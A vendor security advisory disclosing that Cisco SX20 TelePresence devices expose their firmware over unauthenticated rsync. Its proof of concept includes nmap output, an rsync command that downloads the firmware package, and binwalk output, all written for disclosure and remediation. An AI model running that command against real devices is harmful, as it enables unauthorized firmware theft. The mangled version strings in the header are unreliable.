usd-2018-0035 | Cisco Unified Communications Manager (CallManager)/184.108.40.20600-18 (likely in all versions)
Advisory ID: usd-2018-0035
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 220.127.116.1100-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Medium
Vendor URL: https://www.cisco.com
Vendor Status: „is not considered to be an exposure“
usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.
The Cisco SX20 TelePresence Quick is a set of devices that can be used for video conferencing. Typically they are paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.
Proof of Concept
Let 10.10.10.10 be the IP address of a SX20 device.
An nmap scan identifies the following open services:
4043/tcp open rsync (protocol version 29) 4045/tcp open lockd? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer: | version: ce9.4.1 6ae80e1f2ee 2018-08-14 | method: rsync | url: rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg |_ targets: 102300-3,102310-0,102310-1,101282-0
The following command will download the idefix.pkg file advertised by TCP port 4045:
# rsync rsync://[::ffff:10.10.10.10]:4043/idefix/idefix.pkg .
Using binwalk, the file is identified as a firmware package:
# binwalk idefix.pkg
DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 3487 0xD9F PEM certificate 7324 0x1C9C Executable script, shebang: "/bin/sh" 13549 0x34ED Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@101:16 13613 0x352D Unix path: /sys/class/i2c-adapter/i2c-4/4-0054/eeprom@96:5 13672 0x3568 Unix path: /sys/class/gpio/gpio137/value 13808 0x35F0 Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20 44361273 0x2A4E639 uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: "CISCO firmware 32" 44496781 0x2A6F78D CRC32 polynomial table, little endian 44505174 0x2A71856 Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: "oo long" 44607241 0x2A8A709 CRC32 polynomial table, little endian 44612405 0x2A8BB35 uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: "CISCO ramdisk 20180605-3a15e0444CertISW" 44613317 0x2A8BEC5 gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25 64949749 0x3DF0DF5 uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "CISCO kernel 20180605-3a15e04445CertISW" 64967148 0x3DF51EC gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00) 68741741 0x418EA6D Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34 89684647 0x5587AA7 Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39
Please note that at the point of this writing, usd AG has not performed any additional firmware analysis.
Enable authentication for the rsync service or disable it if possible.
- 2018-10-31 Advisory has been sent to email@example.com
- 2018-11-07 Cisco states that they they do not consider this to be an exposure
- 2018-11-09 extended public disclosure deadline to 2019-01-23
- 2019-01-23 Security advisory released
This security vulnerability was discovered by Marcus Gruber and Maximilian Boehner of usd AG.
ABOUT usd SECURITY ADVISORIES
In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.
Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.
Always for the sake of our mission: „more security.“
In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.
The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.